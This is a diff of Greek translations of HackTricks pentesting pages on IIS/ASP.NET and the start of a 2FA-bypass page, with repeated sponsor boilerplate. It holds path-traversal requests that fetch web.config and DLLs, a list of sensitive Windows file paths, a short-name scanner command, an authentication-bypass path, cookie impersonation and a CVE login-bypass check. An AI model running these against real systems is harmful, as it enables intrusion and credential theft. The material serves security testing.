* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στα HackTricks** ή να **κατεβάσετε τα HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια στο GitHub.
|
||||
|
||||
</details>
|
||||
|
||||
Ελέγξτε τις επεκτάσεις αρχείων εκτελέσιμων δοκιμαστικών:
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλου λογισμικού**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
---
|
||||
|
||||
Δοκιμάστε επεκτάσεις αρχείων εκτελέσιμων αρχείων:
|
||||
|
||||
* asp
|
||||
* aspx
|
||||
|
@ -23,12 +37,12 @@
|
|||
|
||||
## Αποκάλυψη Εσωτερικής Διεύθυνσης IP
|
||||
|
||||
Σε οποιονδήποτε διακομιστή IIS όπου λαμβάνετε έναν κωδικό 302, μπορείτε να δοκιμάσετε να αφαιρέσετε την κεφαλίδα Host και να χρησιμοποιήσετε το HTTP/1.0 και μέσα στην απόκριση η κεφαλίδα Location μπορεί να σας κατευθύνει στην εσωτερική διεύθυνση IP:
|
||||
Σε οποιονδήποτε διακομιστή IIS όπου λάβετε έναν κωδικό 302, μπορείτε να δοκιμάσετε να αφαιρέσετε την κεφαλίδα Host και να χρησιμοποιήσετε HTTP/1.0 και μέσα στην απάντηση η κεφαλίδα Τοποθεσία μπορεί να σας οδηγήσει στην εσωτερική διεύθυνση IP:
|
||||
```
|
||||
nc -v domain.com 80
|
||||
openssl s_client -connect domain.com:443
|
||||
```
|
||||
Απόκριση που αποκαλύπτει την εσωτερική IP:
|
||||
Απάντηση που αποκαλύπτει την εσωτερική IP:
|
||||
```
|
||||
GET / HTTP/1.0
|
||||
|
||||
|
@ -41,13 +55,13 @@ X-FEServer: NHEXCHANGE2016
|
|||
```
|
||||
## Εκτέλεση αρχείων .config
|
||||
|
||||
Μπορείτε να ανεβάσετε αρχεία .config και να τα χρησιμοποιήσετε για να εκτελέσετε κώδικα. Ένας τρόπος για να το κάνετε αυτό είναι να προσθέσετε τον κώδικα στο τέλος του αρχείου μέσα σε ένα σχόλιο HTML: [Κατεβάστε το παράδειγμα εδώ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
|
||||
Μπορείτε να μεταφορτώσετε αρχεία .config και να τα χρησιμοποιήσετε για να εκτελέσετε κώδικα. Ένας τρόπος να το κάνετε είναι να προσθέσετε τον κώδικα στο τέλος του αρχείου μέσα σε ένα σχόλιο HTML: [Λήψη παραδείγματος εδώ](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Upload%20Insecure%20Files/Configuration%20IIS%20web.config/web.config)
|
||||
|
||||
Περισσότερες πληροφορίες και τεχνικές για την εκμετάλλευση αυτής της ευπάθειας [εδώ](https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/)
|
||||
|
||||
## IIS Discovery Bruteforce
|
||||
## Βία ανακάλυψης IIS
|
||||
|
||||
Κατεβάστε τη λίστα που έχω δημιουργήσει:
|
||||
Λήψη της λίστας που δημιούργησα:
|
||||
|
||||
{% file src="../../.gitbook/assets/iisfinal.txt" %}
|
||||
|
||||
|
@ -60,22 +74,21 @@ X-FEServer: NHEXCHANGE2016
|
|||
[https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt](https://raw.githubusercontent.com/danielmiessler/SecLists/master/Discovery/Web-Content/SVNDigger/cat/Language/asp.txt)\
|
||||
[https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt](https://raw.githubusercontent.com/xmendez/wfuzz/master/wordlist/vulns/iis.txt)
|
||||
|
||||
Χρησιμοποιήστε την χωρίς να προσθέσετε καμία επέκταση, τα αρχεία που την χρειάζονται την έχουν ήδη.
|
||||
Χρησιμοποιήστε το χωρίς να προσθέσετε κάποια επέκταση, τα αρχεία που το χρειάζονται την έχουν ήδη.
|
||||
|
||||
## Παρακολούθηση διαδρομής
|
||||
## Διάβαθμιση διαδρομής
|
||||
|
||||
### Διαρροή κώδικα πηγής
|
||||
|
||||
Ελέγξτε την πλήρη ανάλυση στο: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
|
||||
Ελέγξτε το πλήρες άρθρο στο: [https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html](https://blog.mindedsecurity.com/2018/10/from-path-traversal-to-source-code-in.html)
|
||||
|
||||
{% hint style="info" %}
|
||||
Ως συνοπτική περίληψη, υπάρχουν αρκετά αρχεία web.config μέσα στους φακέλους της εφαρμογής με αναφορές σε αρχεία "**assemblyIdentity**" και "**namespaces**". Με αυτές τις πληροφορίες είναι δυνατόν να γνωρίζετε **πού βρίσκονται τα εκτελέσιμα** και να τα κατεβάσετε.\
|
||||
Από τα **κατεβασμένα Dlls** είναι επίσης δυνατόν να βρεθούν **νέα namespaces** όπου θα πρέπει να προσπαθήσετε να έχετε πρόσβαση και να πάρετε το αρχείο web.config για να βρείτε νέα namespaces και assemblyIdentity.\
|
||||
Επίσης, τα αρχεία **connectionstrings.config** και **global.asax** μπορεί να περιέχουν ενδιαφέρουσες πληροφορίες.\
|
||||
|
||||
Ως περίληψη, υπάρχουν αρκετά αρχεία web.config μέσα στους φακέλους της εφαρμογής με αναφορές σε αρχεία "**assemblyIdentity**" και "**namespaces**". Με αυτές τις πληροφορίες είναι δυνατό να γνωρίζετε **πού βρίσκονται τα εκτελέσιμα αρχεία** και να τα κατεβάσετε.\
|
||||
Από τα **κατεβασμένα Dlls** είναι επίσης δυνατό να βρείτε **νέα namespaces** όπου πρέπει να προσπελάσετε και να βρείτε το αρχείο web.config για να βρείτε νέα namespaces και assemblyIdentity.\
|
||||
Επίσης, τα αρχεία **connectionstrings.config** και **global.asax** μπορεί να περιέχουν ενδιαφέρουσες πληροφορίες.\\
|
||||
{% endhint %}
|
||||
|
||||
Στις εφαρμογές **.Net MVC**, το αρχείο **web.config** παίζει κρίσιμο ρόλο καθορίζοντας κάθε δυαδικό αρχείο στο οποίο εξαρτάται η εφαρμογή μέσω των ετικετών XML "**assemblyIdentity**".
|
||||
Στις εφαρμογές **.Net MVC**, το αρχείο **web.config** παίζει κρίσιμο ρόλο καθορίζοντας κάθε δυαδικό αρχείο στο οποίο βασίζεται η εφαρμογή μέσω των ετικετών XML **"assemblyIdentity"**.
|
||||
|
||||
### **Εξερεύνηση δυαδικών αρχείων**
|
||||
|
||||
|
@ -86,35 +99,35 @@ Host: example-mvc-application.minded
|
|||
```
|
||||
Αυτό το αίτημα αποκαλύπτει διάφορες ρυθμίσεις και εξαρτήσεις, όπως:
|
||||
|
||||
- Έκδοση **EntityFramework**
|
||||
- **AppSettings** για ιστοσελίδες, επικύρωση πελάτη και JavaScript
|
||||
- Ρυθμίσεις **System.web** για πιστοποίηση και χρόνο εκτέλεσης
|
||||
- Ρυθμίσεις **System.webServer** για τα modules
|
||||
- Δέσμευση συναρτήσεων **Runtime** για πολλές βιβλιοθήκες όπως **Microsoft.Owin**, **Newtonsoft.Json** και **System.Web.Mvc**
|
||||
* **Έκδοση EntityFramework**
|
||||
* **AppSettings** για webpages, επικύρωση πελάτη και JavaScript
|
||||
* Ρυθμίσεις **System.web** για πιστοποίηση και χρόνο εκτέλεσης
|
||||
* Ρυθμίσεις **System.webServer** modules
|
||||
* Δέσμευση συναρμολογήσεων **Runtime** για πολλές βιβλιοθήκες όπως **Microsoft.Owin**, **Newtonsoft.Json**, και **System.Web.Mvc**
|
||||
|
||||
Αυτές οι ρυθμίσεις υποδηλώνουν ότι ορισμένα αρχεία, όπως το **/bin/WebGrease.dll**, βρίσκονται στον φάκελο /bin της εφαρμογής.
|
||||
Αυτές οι ρυθμίσεις υποδηλώνουν ότι ορισμένα αρχεία, όπως το **/bin/WebGrease.dll**, βρίσκονται μέσα στον φάκελο εφαρμογής /bin.
|
||||
|
||||
### **Αρχεία Ρίζας Καταλόγου**
|
||||
### **Αρχεία Καταλόγου Root**
|
||||
|
||||
Τα αρχεία που βρίσκονται στον ριζικό κατάλογο, όπως το **/global.asax** και το **/connectionstrings.config** (το οποίο περιέχει ευαίσθητους κωδικούς πρόσβασης), είναι απαραίτητα για τη διαμόρφωση και λειτουργία της εφαρμογής.
|
||||
Αρχεία που βρίσκονται στον κατάλογο ρίζας, όπως το **/global.asax** και το **/connectionstrings.config** (που περιέχει ευαίσθητους κωδικούς πρόσβασης), είναι ουσιώδη για τη διαμόρφωση και λειτουργία της εφαρμογής.
|
||||
|
||||
### **Ονόματα Χώρων Ονομάτων και Web.Config**
|
||||
### **Ονόματα και Web.Config**
|
||||
|
||||
Οι εφαρμογές MVC ορίζουν επίσης επιπλέον **αρχεία web.config** για συγκεκριμένους χώρους ονομάτων, προκειμένου να αποφευχθούν επαναλαμβανόμενες δηλώσεις σε κάθε αρχείο, όπως φαίνεται από ένα αίτημα για λήψη ενός άλλου **web.config**.
|
||||
Οι εφαρμογές MVC ορίζουν επίσης επιπλέον **αρχεία web.config** για συγκεκριμένους ονομαστικούς χώρους για να αποφευχθούν επαναλαμβανόμενες δηλώσεις σε κάθε αρχείο, όπως φαίνεται με ένα αίτημα για λήψη ενός άλλου **web.config**:
|
||||
```markup
|
||||
GET /download_page?id=..%2f..%2fViews/web.config HTTP/1.1
|
||||
Host: example-mvc-application.minded
|
||||
```
|
||||
### **Λήψη DLLs**
|
||||
|
||||
Η αναφορά σε ένα προσαρμοσμένο namespace υποδηλώνει την ύπαρξη ενός DLL με το όνομα "**WebApplication1**" στον κατάλογο /bin. Ακολουθεί ένα αίτημα για λήψη του **WebApplication1.dll**:
|
||||
Η αναφορά σε ένα προσαρμοσμένο namespace υπονοεί την ύπαρξη ενός DLL με το όνομα "**WebApplication1**" που βρίσκεται στον κατάλογο /bin. Ακολούθως, παρουσιάζεται μια αίτηση για λήψη του **WebApplication1.dll**:
|
||||
```markup
|
||||
GET /download_page?id=..%2f..%2fbin/WebApplication1.dll HTTP/1.1
|
||||
Host: example-mvc-application.minded
|
||||
```
|
||||
Αυτό υποδηλώνει την ύπαρξη άλλων απαραίτητων DLLs, όπως το **System.Web.Mvc.dll** και το **System.Web.Optimization.dll**, στον φάκελο /bin.
|
||||
Αυτό υποδηλώνει την ύπαρξη άλλων βασικών DLLs, όπως το **System.Web.Mvc.dll** και το **System.Web.Optimization.dll**, στον κατάλογο /bin.
|
||||
|
||||
Σε ένα σενάριο όπου ένα DLL εισάγει ένα namespace με το όνομα **WebApplication1.Areas.Minded**, ένας επιτιθέμενος μπορεί να συμπεράνει την ύπαρξη άλλων αρχείων web.config σε προβλέψιμες διαδρομές, όπως **/area-name/Views/**, που περιέχουν συγκεκριμένες ρυθμίσεις και αναφορές σε άλλα DLLs στον φάκελο /bin. Για παράδειγμα, ένα αίτημα στο **/Minded/Views/web.config** μπορεί να αποκαλύψει ρυθμίσεις και namespaces που υποδεικνύουν την ύπαρξη ενός άλλου DLL, του **WebApplication1.AdditionalFeatures.dll**.
|
||||
Σε ένα σενάριο όπου ένα DLL εισάγει ένα namespace που ονομάζεται **WebApplication1.Areas.Minded**, ένας εισβολέας μπορεί να συμπεράνει την ύπαρξη άλλων αρχείων web.config σε προβλέψιμα μονοπάτια, όπως το **/area-name/Views/**, περιέχοντας συγκεκριμένες ρυθμίσεις και αναφορές σε άλλα DLLs στον φάκελο /bin. Για παράδειγμα, μια αίτηση προς το **/Minded/Views/web.config** μπορεί να αποκαλύψει ρυθμίσεις και namespaces που υποδηλώνουν την ύπαρξη ενός άλλου DLL, του **WebApplication1.AdditionalFeatures.dll**.
|
||||
|
||||
### Κοινά αρχεία
|
||||
|
||||
|
@ -195,11 +208,63 @@ C:\xampp\security\webdav.htpasswd
|
|||
C:\xampp\sendmail\sendmail.ini
|
||||
C:\xampp\tomcat\conf\server.xml
|
||||
```
|
||||
## HTTPAPI 2.0 Σφάλμα 404
|
||||
## HTTPAPI 2.0 404 Σφάλμα
|
||||
|
||||
Εάν βλέπετε ένα σφάλμα όπως το παρακάτω:
|
||||
Εάν δείτε ένα σφάλμα όπως το παρακάτω:
|
||||
|
||||
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1)
|
||||
![](<../../.gitbook/assets/image (446) (1) (2) (2) (3) (3) (2) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (10) (10) (2).png>)
|
||||
|
||||
Σημαίνει ότι ο διακομιστής **δεν λάβει το σωστό όνομα τομέα** μέσα στην κεφαλίδα Κεντρικού Υπολογιστή.\
|
||||
Για να έχετε πρόσβαση στην ιστοσελίδα, μπορείτε να ελέγξετε το **Πιστοποιητικό SSL** που χρησιμοποιείται και ίσως βρείτε το όνομα τομέα/υποτομέα εκεί. Αν δεν υπάρχει εκεί, μπορεί να χρειαστεί να **δοκιμάσετε βίαια τους VHosts** μέχρι να βρείτε το σωστό.
|
||||
|
||||
## Παλιές ευπάθειες του IIS που αξίζει να αναζητήσετε
|
||||
|
||||
### Ευπάθεια/Χαρακτηριστικό του τίλντα χαρακτήρα του Microsoft IIS - Αποκάλυψη Σύντομου Ονόματος Αρχείου/Φακέλου
|
||||
|
||||
Μπορείτε να **απαριθμήσετε φακέλους και αρχεία** μέσα σε κάθε ανακαλυφθέντα φάκελο (ακόμη και αν απαιτείται Βασική Ταυτοποίηση) χρησιμοποιώντας αυτήν τη **τεχνική**.\
|
||||
Το κύριο περιορισμό αυτής της τεχνικής είναι ότι **μπορεί να βρει μόνο μέχρι τους πρώτους 6 χαρακτήρες του ονόματος κάθε αρχείου/φακέλου και τους πρώτους 3 χαρακτήρες της επέκτασης** των αρχείων.
|
||||
|
||||
Μπορείτε να χρησιμοποιήσετε [https://github.com/irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner) για να ελέγξετε αυτήν την ευπάθεια: `java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/`
|
||||
|
||||
![](<../../.gitbook/assets/image (841).png>)
|
||||
|
||||
Αρχική έρευνα: [https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf](https://soroush.secproject.com/downloadable/microsoft\_iis\_tilde\_character\_vulnerability\_feature.pdf)
|
||||
|
||||
Μπορείτε επίσης να χρησιμοποιήσετε **metasploit**: `use scanner/http/iis_shortname_scanner`
|
||||
|
||||
### Παράκαμψη Βασικής Ταυτοποίησης
|
||||
|
||||
**Παρακάμψτε** μια βασική ταυτοποίηση (**IIS 7.5**) προσπαθώντας να έχετε πρόσβαση στο: `/admin:$i30:$INDEX_ALLOCATION/admin.php` ή `/admin::$INDEX_ALLOCATION/admin.php`
|
||||
|
||||
Μπορείτε να **συνδυάσετε** αυτήν την **ευπάθεια** με την προηγούμενη για να βρείτε νέους **φακέλους** και να **παρακάμψετε** την ταυτοποίηση.
|
||||
|
||||
## Ενεργοποιημένη αποσφαλμάτωση ASP.NET Trace.AXD
|
||||
|
||||
Το ASP.NET περιλαμβάνει έναν τρόπο αποσφαλμάτωσης και το αρχείο του ονομάζεται `trace.axd`.
|
||||
|
||||
Διατηρεί ένα πολύ λεπτομερές αρχείο καταγραφής όλων των αιτήσεων που γίνονται σε μια εφαρμογή κατά μήκος ενός χρονικού διαστήματος.
|
||||
|
||||
Αυτές οι πληροφορίες περιλαμβάνουν απομακρυσμένες διευθύνσεις IP πελατών, αναγνωριστικά συνεδρίας, όλα τα cookies αιτήσεων και απαντήσεων, φυσικούς διαδρόμους, πληροφορίες κώδικα πηγής και πιθανώς ακόμη και ονόματα χρηστών και κωδικούς πρόσβασης.
|
||||
|
||||
[https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/](https://www.rapid7.com/db/vulnerabilities/spider-asp-dot-net-trace-axd/)
|
||||
|
||||
![Screenshot 2021-03-30 at 13 19 11](https://user-images.githubusercontent.com/31736688/112974448-2690b000-915b-11eb-896c-f41c27c44286.png)
|
||||
|
||||
## Μπισκότο ASPXAUTH
|
||||
|
||||
Το ASPXAUTH χρησιμοποιεί τις ακόλουθες πληροφορίες:
|
||||
|
||||
* **`validationKey`** (συμβολοσειρά): κλειδί σε μορφή εξάδας για τον έλεγχο υπογραφής.
|
||||
* **`decryptionMethod`** (συμβολοσειρά): (προεπιλογή "AES").
|
||||
* **`decryptionIV`** (συμβολοσειρά): διάνυσμα αρχικοποίησης σε μορφή εξάδας (προεπιλογή σε ένα διάνυσμα με μηδενικά).
|
||||
* **`decryptionKey`** (συμβολοσειρά): κλειδί σε μορφή εξάδας για την αποκρυπτογράφηση.
|
||||
|
||||
Ωστόσο, μερικοί άνθρωποι θα χρησιμοποιήσουν τις **προεπιλεγμένες τιμές** αυτών των παραμέτρων και θα χρησιμοποιήσουν ως **μπισκότο το email του χρήστη**. Επομένως, αν μπορείτε να βρείτε μια ιστοσελίδα που χρησιμοποιεί την **ίδια πλατφόρμα** που χρησιμοποιεί το μπισκότο ASPXAUTH και **δημιουργήσετε ένα χρήστη με το email του χρήστη που θέλετε να προσωποποιήσετε** στον διακομιστή που είναι υπό επίθεση, μπορείτε να **χρησιμοποιήσετε το μπισκότο από τον δεύτερο διακομιστή στον πρώτο** και να προσωποποιήσετε τον χρήστη.\
|
||||
Αυτή η επίθεση λειτούργησε σε αυτό το [**άρθρο**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19).
|
||||
|
||||
## Παράκαμψη Ταυτοποίησης IIS με κρυφούς κωδικούς πρόσβασης (CVE-2022-30209) <a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
|
||||
|
||||
[Πλήρης έκθεση εδώ](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): Ένα σφάλμα στον κώδικα **δεν ελέγχει σωστά τον κωδικό που δίνεται από τον χρήστη**, έτσι ένας επιτιθέμενος του οποίου ο κατακερματισμένος κωδικός χτυπάει ένα κλειδί που είναι ήδη στη **μνήμη cache** θα μπορεί να συνδεθεί ως αυτός ο χρήστης.
|
||||
```python
|
||||
# script for sanity check
|
||||
> type test.py
|
||||
|
@ -219,16 +284,28 @@ HTTP/1.1 401 Unauthorized
|
|||
> curl -I -su 'orange:ZeeiJT' 'http://<iis>/protected/' | findstr HTTP
|
||||
HTTP/1.1 200 OK
|
||||
```
|
||||
## WhiteIntel
|
||||
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι ένας μηχανισμός αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αναλήψεων λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλο λογισμικό που κλέβει πληροφορίες.
|
||||
|
||||
Μπορείτε να ελέγξετε την ιστοσελίδα τους και να δοκιμάσετε τον μηχανισμό τους δωρεάν στο:
|
||||
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι για να υποστηρίξετε το HackTricks:
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Εάν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε στη** 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στη [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs στα** [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια του [**HackTricks**](https://github.com/carlospolop/hacktricks) και του [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
|
||||
|
||||
</details>
|
||||
|
|
|
@ -2,48 +2,108 @@
|
|||
|
||||
<details>
|
||||
|
||||
<summary><strong>Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Μάθετε να χακάρετε το AWS από το μηδέν μέχρι τον ήρωα με το</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Ειδικός Red Team του HackTricks AWS)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Άλλοι τρόποι υποστήριξης του HackTricks:
|
||||
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας να διαφημίζεται στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αν θέλετε να δείτε την **εταιρεία σας διαφημισμένη στο HackTricks** ή να **κατεβάσετε το HackTricks σε μορφή PDF** ελέγξτε τα [**ΣΧΕΔΙΑ ΣΥΝΔΡΟΜΗΣ**](https://github.com/sponsors/carlospolop)!
|
||||
* Αποκτήστε το [**επίσημο PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ανακαλύψτε [**The PEASS Family**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Συμμετάσχετε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα telegram**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Μοιραστείτε τα χάκινγκ κόλπα σας υποβάλλοντας PRs** στα αποθετήρια [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) στο github.
|
||||
* Ανακαλύψτε [**την Οικογένεια PEASS**](https://opensea.io/collection/the-peass-family), τη συλλογή μας από αποκλειστικά [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Εγγραφείτε** στην 💬 [**ομάδα Discord**](https://discord.gg/hRep4RUj7f) ή στην [**ομάδα τηλεγραφήματος**](https://t.me/peass) ή **ακολουθήστε** μας στο **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Μοιραστείτε τα κόλπα σας στο χάκινγκ υποβάλλοντας PRs** στα [**HackTricks**](https://github.com/carlospolop/hacktricks) και [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) αποθετήρια του github.
|
||||
|
||||
</details>
|
||||
|
||||
## **Τεχνικές Παράκαμψης Ενισχυμένης Διπλής Πιστοποίησης**
|
||||
## WhiteIntel
|
||||
|
||||
### **Άμεση Πρόσβαση στο Τέλος Σημείου**
|
||||
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
Για να παρακάμψετε την 2FA, αποκτήστε άμεση πρόσβαση στο επόμενο σημείο, γνωρίζοντας τη διαδρομή είναι κρίσιμο. Αν αποτύχετε, αλλάξτε τον **κεφαλίδα Referrer** για να μιμηθείτε την πλοήγηση από τη σελίδα επαλήθευσης 2FA.
|
||||
[**WhiteIntel**](https://whiteintel.io) είναι μια μηχανή αναζήτησης που τροφοδοτείται από το **dark web** και προσφέρει **δωρεάν** λειτουργίες για να ελέγξετε αν μια εταιρεία ή οι πελάτες της έχουν **διαρρεύσει** από **κλέφτες κακόβουλων λογισμικών**.
|
||||
|
||||
### **Επαναχρησιμοποίηση Διακριτικού**
|
||||
Ο κύριος στόχος του WhiteIntel είναι η καταπολέμηση των αποκλεισμών λογαριασμών και των επιθέσεων ransomware που προκύπτουν από κακόβουλα λογισμικά που κλέβουν πληροφορίες.
|
||||
|
||||
Η επαναχρησιμοποίηση προηγουμένως χρησιμοποιημένων διακριτικών για την πιστοποίηση εντός ενός λογαριασμού μπορεί να είναι αποτελεσματική.
|
||||
Μπορείτε να ελέγξετε τον ιστότοπό τους και να δοκιμάσετε τη μηχανή τους δωρεάν στο:
|
||||
|
||||
### **Χρήση Αχρησιμοποίητων Διακριτικών**
|
||||
{% embed url="https://whiteintel.io" %}
|
||||
|
||||
Μπορεί να γίνει προσπάθεια εξαγωγής ενός διακριτικού από τον δικό σας λογαριασμό για να παρακάμψετε την 2FA σε έναν άλλο λογαριασμό.
|
||||
---
|
||||
|
||||
## **Τεχνικές Παράκαμψης Ενισχυμένης Διπλής Ταυτοποίησης Παράγοντα**
|
||||
|
||||
### **Άμεση Πρόσβαση στο Τέλος**
|
||||
|
||||
Για να παρακάμψετε την 2FA, προσπελάστε απευθείας το αντίστοιχο τέλος, γνωρίζοντας ότι η διαδρομή είναι κρίσιμη. Αν αποτύχετε, αλλάξτε τον **κεφαλίδα Αναφορέα** για να μιμηθείτε την πλοήγηση από τη σελίδα επαλήθευσης 2FA.
|
||||
|
||||
### **Επαναχρησιμοποίηση Διακριτικών**
|
||||
|
||||
